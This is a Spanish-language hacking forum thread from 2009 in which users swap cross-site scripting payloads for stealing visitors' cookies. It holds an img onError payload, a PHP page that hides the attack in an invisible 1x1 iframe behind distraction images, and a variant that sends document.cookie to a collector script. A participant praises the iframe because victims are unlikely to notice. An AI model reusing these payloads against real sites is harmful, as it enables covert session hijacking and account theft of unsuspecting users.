Duda sobre XSS

Iniciado por pedrox@, 2 Marzo 2009, 01:52 AM

0 Miembros y 1 Visitante están viendo este tema.

Azielito

aun que creo recordar que se puede poner algo asi como
Código (html) [Seleccionar]
<img src="" onError="javascript:alert(document.cookie)" />

No he probado hasta donde se puede llevar ese "onError" pero me funciono en Firefox y en iExplorer :')

WHK

#11
o con onload="alert(document.cookie)" pero si vas a hacer eso ps entonces mejor pones el javascript de plano en el html incrustado pero para que no se vea o por lo menos se disimule que se haga en un iframe y que ese iframe contenga un javascript cifrado talves con "web encript" y que imprima un location hacia el xss, es mas, ni si quiera necesitas hacer eso, basta con php y un <?php header('location: ...'); ?> ya que desde ajáx no compartes sesiones como para compartir las cookies haciendo llamadas remotas. Es mas, ni si quiera necesitas insertar otro archivo en el iframe:

Código (php) [Seleccionar]
<?php 
$xss 
'x"><sCrIpT s=d>r=document; alert(r.cookie);</ScRiPt><br x="x';
$distraccion[] = 
'http://www.unaplauso.com/images/anuncios/3/9/7/793_animacion-payaso-pitiklin_2.jpg';
$distraccion[] = 
'http://www.ctv.es/USERS/hnostar/TECH/V9000/payaso.jpg';
$distraccion[] = 
'http://mikevsdinos.files.wordpress.com/2008/09/payaso.jpg';
$distraccion[] = 
'http://www.galeriade.com/Sirona/data/media/3/Payaso_Moderno_-_DSC_2512.jpg';

$distraccion $distraccion[rand(0, (count($distraccion) - 1))];
?>

<html>
<img border="0" src="<?php echo $distraccion?>"/>
<br />
<iframe src="http://www.victima.com/vulnerable.php?variable=<?php
 
echo urlencode($xss); 
?>
" width="1" height="1" frameborder="0"></iframe>
</html>

pedrox@

yeee

me hize un archivo llamado entra.php con lo que comentaste del iframe:

Código (php) [Seleccionar]
<?php
$xss 
urlencode("<script>window.location='http://localhost/xss/xss.php?cookie='+document.cookie;</script>");
?>


<html>
<iframe src="http://localhost/xss/vuln.php?vuln=<?=$xss?>" width="1" height="1" frameborder="0"></iframe>
</html>


Al parecer lo del iframe si es buena idea ya que como no ponga un sniffer y vea los request dudo que se de nadie cuenta. Con <img entonces no se puede hacer verdad?

intente:
<img src="http://localhost/xss/vuln.php?vuln=%3Cscript%3Ewindow.location%3D%27http%3A%2F%2Flocalhost%2Fxss%2Fxss.php%3Fcookie%3D%27%2Bdocument.cookie%3B%3C%2Fscript%3E">

pero no me envia nada al archivo donde almaceno las cookies, vamos no va al window.location.
Con la librería gd de php se podría hacer que carge una imagen y a la vez haga una petición a la web enviandonos la cookie, no? o esto solo sirve para CSRF?

Un saludo, gracias por las respuestas.